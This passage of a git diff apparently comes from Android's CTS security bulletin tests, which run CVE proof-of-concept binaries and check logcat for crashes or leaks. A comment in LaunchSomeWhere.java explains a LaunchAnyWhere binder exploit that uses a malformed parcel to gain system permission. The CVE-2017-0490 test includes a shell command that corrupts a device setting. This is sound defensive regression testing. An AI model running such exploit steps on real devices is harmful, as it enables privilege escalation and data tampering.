+ * Flag meaning the test uses the OOM catcher to fail the test because the test vulnerability
+ * intentionally OOMs the device.
+ */
+ public synchronized void setOomTest() {
+ oomBehavior = OomBehavior.FAIL_NO_LOG;
+ }
+
+ private ITestDevice getDevice() {
+ return context.getDevice();
+ }
+
+ /**
+ * Read through logcat to find when the OomCatcher app reports low memory. Once detected, reboot
+ * the device to prevent a soft reset with the possiblity of ADB becomming unresponsive.
+ */
+ class OomReceiver extends MultiLineReceiver {
+
+ private ITestDevice device = null;
+ private boolean isCancelled = false;
+
+ public OomReceiver(ITestDevice device) {
+ this.device = device;
+ }
+
+ @Override
+ public void processNewLines(String[] lines) {
+ for (String line : lines) {
+ if (Pattern.matches(".*Low memory.*", line)) {
+ // low memory detected, reboot device to clear memory and pass test
+ isCancelled = true;
+ Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG,
+ "lowmemorykiller detected; rebooting device.");
+ synchronized (HostsideOomCatcher.this) { // synchronized for oomDetected
+ oomDetected = true;
+ }
+ try {
+ device.nonBlockingReboot();
+ device.waitForDeviceOnline(60 * 2 * 1000); // 2 minutes
+ context.updateKernelStartTime();
+ } catch (Exception e) {
+ Log.e(LOG_TAG, e.toString());
+ }
+ return; // we don't need to process remaining lines in the array
+ }
+ }
+ }
+
+ @Override
+ public boolean isCancelled() {
+ return isCancelled;
+ }
+ }
+}
+
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/LaunchSomeWhere.java b/hostsidetests/securitybulletin/src/android/security/cts/LaunchSomeWhere.java
new file mode 100644
index 0000000..3a61311
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/LaunchSomeWhere.java
@@ -0,0 +1,93 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.ITestDevice;
+
+/*
+ * Adding Tests:
+ * We are testing a series of exploits that all take advantage of binder in the
+ * same way, using a malformed parcel to get system permission, with the only
+ * difference being the details of how we create the malformed parcel. In order
+ * to take advantage of these similarities (among other reasons) we share code
+ * between these exploits with an app that only requires two things to run a new
+ * version of this exploit: a class implementing IGenerateMalformedParcel and an
+ * intent telling the app which version of the exploit to run.
+ *
+ * When you recieve a new LaunchAnyWhere exploit it will likely be in the form
+ * of an app that can perform a number of actions such as creating a new pin
+ * or installing an app without recieving the appropriate permissions. However,
+ * the only file we care about form the app will be GenMalformedParcel.java.
+ * Find that file and follow these steps to add a new LaunchAnyWhere test:
+ *
+ * 1. Copy GenMalformedParcel.java into the LaunchAnyWhere app at
+ * cts/hostsidetests/security/test-apps/launchanywhere/src... Rename the file
+ * and class after the CVE that you are addressing. Modify the class
+ * signature and method signature so that it implements
+ * IGenerateMalformedParcel (namely, add the `implements` clause and change
+ * the function to public Parcel generate(Intent intent)).
+ *
+ * 2. Next, add a hostside test to the appropriate file in this directory.
+ * In the test all you have to do is call
+ * LaunchSomeWhere.launchSomeWhere("CVE_20XX_XXXXX", getDevice());
+ *
+ * 3. Verify your test and submit, assuming all went well. If not then check
+ * for differences between the files in the submitted apk and the code in
+ * tests/tests/security/src/android/security/cts/launchanywhere.
+ *
+ * Exploit Overview:
+ * All LaunchAnyWhere exploits take advantage of classes that write more data
+ * than they read. They follow the same process to send an intent with system
+ * permissions. The process is described below (you do not need to understand
+ * this in order to create tests, but we learned this while debugging some
+ * things and don't want the information to be lost):
+ *
+ * 1. Add an account with the account type 'com.launchanywhere' When an account
+ * is added the AccountManager delegates the task of authenticating the
+ * account to an instance of AbstractAccountAuthenticator. Our malicious
+ * authenticator finds
+ * android.accounts.IAccountAuthenticatorResponse.Stub.Proxy and replaces
+ * it's mRemote field with our anonymous IBinder before returning a
+ * default-constructed bundle. We save the old value and delegate to it
+ * after altering the arguments when appropriate (MitM).
+ *
+ * 2. When we finish, our IBinder's transact is called. At this point we create
+ * a reboot intent and send it to the appropriate class to generate the
+ * malformed parcel. This grants the intent system permissions.
+ *
+ * 3. The phone reboots, proving a successful exploit.
+ */
+class LaunchSomeWhere {
+ public static void launchSomeWhere(String cve, ITestDevice device)
+ throws Exception {
+
+ String command = "am start";
+
+ String[] args = {
+ "--es", "cve", cve,
+ "-n", "com.android.security.cts.launchanywhere/.StartExploit"
+ };
+
+ for (String s : args) {
+ command += " " + s;
+ }
+
+ AdbUtils.runCommandLine(command, device);
+ if (device.waitForDeviceNotAvailable(9_000))
+ device.waitForDeviceAvailable();
+ }
+}
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java
index d3da935..9a7e62a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java
@@ -23,19 +23,31 @@
/**
* b/26323455
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-04")
public void testPocCVE_2016_2419() throws Exception {
AdbUtils.runCommandLine("logcat -c" , getDevice());
AdbUtils.runPoc("CVE-2016-2419", getDevice(), 60);
String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*IOMX_InfoLeak b26323455[\\s\\n\\S]*", logcat);
+ assertNotMatchesMultiLine("IOMX_InfoLeak b26323455", logcat);
}
/**
* b/26324307
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-04")
public void testPocCVE_2016_0844() throws Exception {
AdbUtils.runPoc("CVE-2016-0844", getDevice(), 60);
}
+
+ /**
+ * b/26593930
+ */
+ @SecurityTest(minPatchLevel = "2016-04")
+ public void testPocCVE_2016_2412() throws Exception {
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runPoc("CVE-2016-2412", getDevice(), 60);
+ String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine("Fatal signal[\\s\\S]*>>> system_server <<<",
+ logcatOut);
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
index 9a1030d..d866a5a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
@@ -23,12 +23,20 @@
/**
* b/27555981
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-05")
public void testPocCVE_2016_2460() throws Exception {
AdbUtils.runCommandLine("logcat -c" , getDevice());
AdbUtils.runPoc("CVE-2016-2460", getDevice(), 60);
String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*IGraphicBufferProducer_Info is Leaked[\\s\\n\\S]*", logcat);
+ assertNotMatchesMultiLine("IGraphicBufferProducer_Info is Leaked", logcat);
+ }
+
+ /**
+ * b/27275324
+ */
+ @SecurityTest(minPatchLevel = "2016-05")
+ public void testPocCVE_2015_1805() throws Exception {
+ AdbUtils.runPoc("CVE-2015-1805", getDevice(), 300);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
index 2601d43..1e33083 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
@@ -22,8 +22,20 @@
/**
* b/28740702
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testPocCVE_2016_3818() throws Exception {
AdbUtils.runPoc("CVE-2016-3818", getDevice(), 60);
}
+
+ /**
+ * b/27890802
+ */
+ @SecurityTest(minPatchLevel = "2016-07")
+ public void testPocCVE_2016_3746() throws Exception {
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runPoc("CVE-2016-3746", getDevice(), 60);
+ String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine("Fatal signal[\\s\\S]*>>> /system/bin/mediaserver <<<",
+ logcat);
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java
index 7ab08ad..3280a68 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java
@@ -22,7 +22,7 @@
/**
* b/27773913
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-09")
public void testPocCVE_2016_2471() throws Exception {
AdbUtils.runPoc("CVE-2016-2471", getDevice(), 60);
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java
index da8da31..bb18b0d 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java
@@ -1,5 +1,5 @@
/**
- * Copyright (C) 2016 The Android Open Source Project
+ * Copyright (C) 2018 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -22,9 +22,20 @@
public class Poc16_11 extends SecurityTestCase {
/**
+ * b/29149404
+ */
+ @SecurityTest(minPatchLevel = "2016-11")
+ public void testPocCVE_2012_6702() throws Exception {
+ AdbUtils.runCommandLine("logcat -c", getDevice());
+ AdbUtils.runPoc("CVE-2012-6702", getDevice(), 60);
+ String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine("fail: encountered same random values!", logcat);
+ }
+
+ /**
* b/30904789
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testPocCVE_2016_6730() throws Exception {
if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
AdbUtils.runPoc("CVE-2016-6730", getDevice(), 60);
@@ -34,7 +45,7 @@
/**
* b/30906023
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testPocCVE_2016_6731() throws Exception {
if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
AdbUtils.runPoc("CVE-2016-6731", getDevice(), 60);
@@ -44,7 +55,7 @@
/**
* b/30906599
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testPocCVE_2016_6732() throws Exception {
if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
AdbUtils.runPoc("CVE-2016-6732", getDevice(), 60);
@@ -54,7 +65,7 @@
/**
* b/30906694
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testPocCVE_2016_6733() throws Exception {
if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
AdbUtils.runPoc("CVE-2016-6733", getDevice(), 60);
@@ -64,7 +75,7 @@
/**
* b/30907120
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testPocCVE_2016_6734() throws Exception {
if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
AdbUtils.runPoc("CVE-2016-6734", getDevice(), 60);
@@ -74,7 +85,7 @@
/**
* b/30907701
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testPocCVE_2016_6735() throws Exception {
if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
AdbUtils.runPoc("CVE-2016-6735", getDevice(), 60);
@@ -84,7 +95,7 @@
/**
* b/30953284
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testPocCVE_2016_6736() throws Exception {
if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
AdbUtils.runPoc("CVE-2016-6736", getDevice(), 60);
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java
new file mode 100644
index 0000000..be17721
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java
@@ -0,0 +1,34 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc16_12 extends SecurityTestCase {
+
+ //Criticals
+ /**
+ * b/31796940
+ */
+ @SecurityTest(minPatchLevel = "2016-12")
+ public void testPocCVE_2016_8406() throws Exception {
+ String cmd ="ls -l /sys/kernel/slab 2>/dev/null | grep nf_conn";
+ String result = AdbUtils.runCommandLine(cmd ,getDevice());
+ assertNotMatchesMultiLine("nf_conntrack_(?!0{8})[A-Fa-f0-9]{8}", result);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java
index aba9ed0..629f83f 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java
@@ -25,7 +25,7 @@
/**
* b/31797770
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testPocCVE_2016_8425() throws Exception {
if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
AdbUtils.runPoc("CVE-2016-8425", getDevice(), 60);
@@ -35,7 +35,7 @@
/**
* b/31799206
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testPocCVE_2016_8426() throws Exception {
if(containsDriver(getDevice(), "/dev/nvhost-gpu")) {
AdbUtils.runPoc("CVE-2016-8426", getDevice(), 60);
@@ -45,7 +45,7 @@
/**
* b/31799885
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testPocCVE_2016_8427() throws Exception {
if(containsDriver(getDevice(), "/dev/nvhost-gpu") ||
containsDriver(getDevice(), "/dev/nvhost-dbg-gpu")) {
@@ -56,7 +56,7 @@
/**
* b/31993456
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testPocCVE_2016_8428() throws Exception {
if(containsDriver(getDevice(), "/dev/nvmap")) {
AdbUtils.runPoc("CVE-2016-8428", getDevice(), 60);
@@ -66,7 +66,7 @@
/**
* b/32160775
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testPocCVE_2016_8429() throws Exception {
if(containsDriver(getDevice(), "/dev/nvmap")) {
AdbUtils.runPoc("CVE-2016-8429", getDevice(), 60);
@@ -76,7 +76,7 @@
/**
* b/32225180
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testPocCVE_2016_8430() throws Exception {
if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
AdbUtils.runPoc("CVE-2016-8430", getDevice(), 60);
@@ -86,7 +86,7 @@
/**
* b/32402179
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testPocCVE_2016_8431() throws Exception {
if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
AdbUtils.runPoc("CVE-2016-8431", getDevice(), 60);
@@ -96,7 +96,7 @@
/**
* b/32447738
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testPocCVE_2016_8432() throws Exception {
if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
AdbUtils.runPoc("CVE-2016-8432", getDevice(), 60);
@@ -106,7 +106,7 @@
/**
* b/32125137
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testPocCVE_2016_8434() throws Exception {
if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
// This poc is very verbose so we ignore the output to avoid using a lot of memory.
@@ -117,7 +117,7 @@
/**
* b/31668540
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testPocCVE_2016_8460() throws Exception {
if(containsDriver(getDevice(), "/dev/nvmap")) {
String result = AdbUtils.runPoc("CVE-2016-8460", getDevice(), 60);
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java
index fc68707..e2e5134 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java
@@ -22,18 +22,30 @@
/**
* b/32799236
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-02")
public void testPocCVE_2017_0426() throws Exception {
AdbUtils.runCommandLine("logcat -c", getDevice());
AdbUtils.runPoc("CVE-2017-0426", getDevice(), 60);
String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*Bugreports file in wrong path[\\s\\n\\S]*", logcatOut);
+ assertNotMatchesMultiLine("Bugreports file in wrong path", logcatOut);
+ }
+
+ /**
+ * b/32706020
+ */
+ @SecurityTest(minPatchLevel = "2017-02")
+ public void testPocCVE_2017_0415() throws Exception {
+ AdbUtils.runCommandLine("logcat -c", getDevice());
+ AdbUtils.runPoc("CVE-2017-0415", getDevice(), 60);
+ String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine("Fatal signal[\\s\\S]*>>> /system/bin/mediaserver <<<",
+ logcatOut);
}
/**
* b/31799863
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-02")
public void testPocCVE_2016_8482() throws Exception {
if(containsDriver(getDevice(), "/dev/nvmap")) {
AdbUtils.runPoc("CVE-2016-8482", getDevice(), 60);
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java
index 80c959c..0239883 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java
@@ -23,20 +23,20 @@
/**
* b/31824853
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2016_8479() throws Exception {
if (containsDriver(getDevice(), "/dev/kgsl-3d0")) {
- AdbUtils.runPocNoOutput("CVE-2016-8479", getDevice(), 180);
+ AdbUtils.runPocNoOutput("CVE-2016-8479", getDevice(), 180);
// CTS begins the next test before device finishes rebooting,
// sleep to allow time for device to reboot.
- Thread.sleep(30000);
+ Thread.sleep(70000);
}
}
/**
* b/33940449
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2017_0508() throws Exception {
if (containsDriver(getDevice(), "/dev/ion") &&
containsDriver(getDevice(), "/dev/dri/renderD129")) {
@@ -50,7 +50,7 @@
/**
* b/33899363
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2017_0333() throws Exception {
if (containsDriver(getDevice(), "/dev/dri/renderD128")) {
AdbUtils.runPocNoOutput("CVE-2017-0333", getDevice(), 30);
@@ -62,24 +62,44 @@
/**
* b/33245849
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2017_0334() throws Exception {
if (containsDriver(getDevice(), "/dev/dri/renderD129")) {
String out = AdbUtils.runPoc("CVE-2017-0334", getDevice());
- assertNotMatchesMultiLine(".*Leaked ptr is (0x[fF]{6}[cC]0[a-fA-F0-9]{8}"
- +"|0x[c-fC-F][a-fA-F0-9]{7}).*",out);
+ assertNotMatchesMultiLine("Leaked ptr is (0x[fF]{6}[cC]0[a-fA-F0-9]{8}"
+ +"|0x[c-fC-F][a-fA-F0-9]{7})",out);
}
}
/**
* b/32707507
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testPocCVE_2017_0479() throws Exception {
AdbUtils.runCommandLine("logcat -c" , getDevice());
AdbUtils.runPocNoOutput("CVE-2017-0479", getDevice(), 60);
String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatchesMultiLine(".*Fatal signal 11 \\(SIGSEGV\\).*>>> /system/bin/" +
- "audioserver <<<.*", logcatOut);
+ assertNotMatchesMultiLine("Fatal signal 11 \\(SIGSEGV\\).*>>> /system/bin/" +
+ "audioserver <<<", logcatOut);
}
+
+ /*
+ * b/33178389
+ */
+ @SecurityTest(minPatchLevel = "2017-03")
+ public void testPocCVE_2017_0490() throws Exception {
+ String bootCountBefore =
+ AdbUtils.runCommandLine("settings get global boot_count", getDevice());
+ AdbUtils.runCommandLine("service call wifi 43 s16 content://settings/global/boot_count s16 "
+ + "\"application/x-wifi-config\"",
+ getDevice());
+ String bootCountAfter =
+ AdbUtils.runCommandLine("settings get global boot_count", getDevice());
+ // Poc nukes the boot_count setting, reboot to restore it to a sane value
+ AdbUtils.runCommandLine("reboot", getDevice());
+ getDevice().waitForDeviceOnline(60 * 1000);
+ updateKernelStartTime();
+ assertEquals(bootCountBefore, bootCountAfter);
+ }
+
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java
index 71e3975..248e257 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java
@@ -24,7 +24,7 @@
/**
* b/32342065
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testPocCVE_2017_0553() throws Exception {
// Error code of 139 represents segmentation fault
getDevice().executeShellCommand("chmod +x /data/local/tmp/CVE-2017-0553");
@@ -35,7 +35,7 @@
/**
* b/72460737
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testPocCVE_2014_3145() throws Exception {
assertFalse("VULNERABLE DEVICE DETECTED",
AdbUtils.runPocCheckExitCode("CVE-2014-3145", getDevice(), 60));
@@ -44,9 +44,24 @@
/**
* b/32813456
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testPocCVE_2016_10229() throws Exception {
String out = AdbUtils.runPoc("CVE-2016-10229", getDevice());
- assertNotMatchesMultiLine(".*OVERWRITE.*", out);
+ assertNotMatchesMultiLine("OVERWRITE", out);
}
+
+ /**
+ * b/33621647
+ */
+ @SecurityTest(minPatchLevel = "2017-04")
+ public void testPocCVE_2017_0477() throws Exception {
+ AdbUtils.pushResource("/CVE-2017-0477.gif", "/data/local/tmp/CVE-2017-0477.gif",
+ getDevice());
+ AdbUtils.runCommandLine("logcat -c", getDevice());
+
+ // because runPocGetExitCode() isn't a thing
+ AdbUtils.runCommandLine("chmod +x /data/local/tmp/CVE-2017-0477", getDevice());
+ int code = AdbUtils.runCommandGetExitCode("/data/local/tmp/CVE-2017-0477", getDevice());
+ assertTrue(code != 139); // 128 + signal 11
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
deleted file mode 100644
index 2d6b44a..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
+++ /dev/null
@@ -1,35 +0,0 @@
-/**
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import android.platform.test.annotations.SecurityTest;
-
-@SecurityTest
-public class Poc17_05 extends SecurityTestCase {
-
- /**
- * b/34277115
- */
- @SecurityTest
- public void testPocCVE_2017_0630() throws Exception {
- if (containsDriver(getDevice(), "/sys/kernel/debug/tracing/printk_formats")) {
- String commandOutput = AdbUtils.runCommandLine("cat /sys/kernel/debug/tracing" +
- "/printk_formats", getDevice());
- assertNotMatchesMultiLine(".*0x(?!0){8,16}[0-9a-fA-F]{8,16} : .*", commandOutput);
- }
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_06.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_06.java
new file mode 100644
index 0000000..c2c3e29
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_06.java
@@ -0,0 +1,41 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import java.util.concurrent.TimeUnit;
+
+@SecurityTest
+public class Poc17_06 extends SecurityTestCase {
+
+ /**
+ * b/36392138
+ */
+ @SecurityTest(minPatchLevel = "2017-06")
+ public void testPocCVE_2017_0647() throws Exception {
+ AdbUtils.pushResource("/CVE-2017-0647.zip", "/data/local/tmp/CVE-2017-0647.zip",
+ getDevice());
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runCommandLine(
+ "dex2oat " +
+ "--dex-file=/data/local/tmp/CVE-2017-0647.zip " +
+ "--oat-file=/data/local/tmp/out " +
+ "--base=0x50000000", getDevice());
+ String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine("Zip: missed a central dir sig", logcatOut);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java
index 1f9602a..29b7a39 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java
@@ -24,7 +24,7 @@
/**
* b/35443725
**/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testPocCVE_2016_2109() throws Exception {
assertFalse("Overallocation detected!",
AdbUtils.runPocCheckExitCode("CVE-2016-2109",
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java
index 987233d..1659397 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java
@@ -24,7 +24,7 @@
/**
* b/63852675
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testPocCve_2017_6983() throws Exception {
// Error code of 139 represents segmentation fault
assertFalse("Segfault found",
@@ -57,7 +57,7 @@
* b/38195738
* b/36590192
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testPocBug_38195738() throws Exception {
if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
AdbUtils.runPocNoOutput("Bug-38195738", getDevice(), 60);
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java
index 8f1771b..e1c4977 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java
@@ -24,7 +24,7 @@
/**
* b/36075131
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-11")
public void testPocCVE_2017_0859() throws Exception {
AdbUtils.runCommandLine("logcat -c", getDevice());
AdbUtils.pushResource("/cve_2017_0859.mp4", "/sdcard/cve_2017_0859.mp4", getDevice());
@@ -34,8 +34,8 @@
// Wait for intent to be processed before checking logcat
Thread.sleep(5000);
String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatches("[\\s\\n\\S]*Fatal signal 11 \\(SIGSEGV\\)" +
+ assertNotMatchesMultiLine("Fatal signal 11 \\(SIGSEGV\\)" +
"[\\s\\n\\S]*>>> /system/bin/" +
- "mediaserver <<<[\\s\\n\\S]*", logcat);
+ "mediaserver <<<", logcat);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java
index 799e0b6..67becec 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java
@@ -24,10 +24,10 @@
/**
* b/38045794
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-12")
public void testPocCVE_2017_6262() throws Exception {
if(containsDriver(getDevice(),"/dev/dri/renderD128")) {
- AdbUtils.runPocNoOutput("CVE-2017-6262", getDevice(), 900);
+ AdbUtils.runPocNoOutput("CVE-2017-6262", getDevice(), 300);
}
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java
index 1d6c60d..c9f48f9 100644
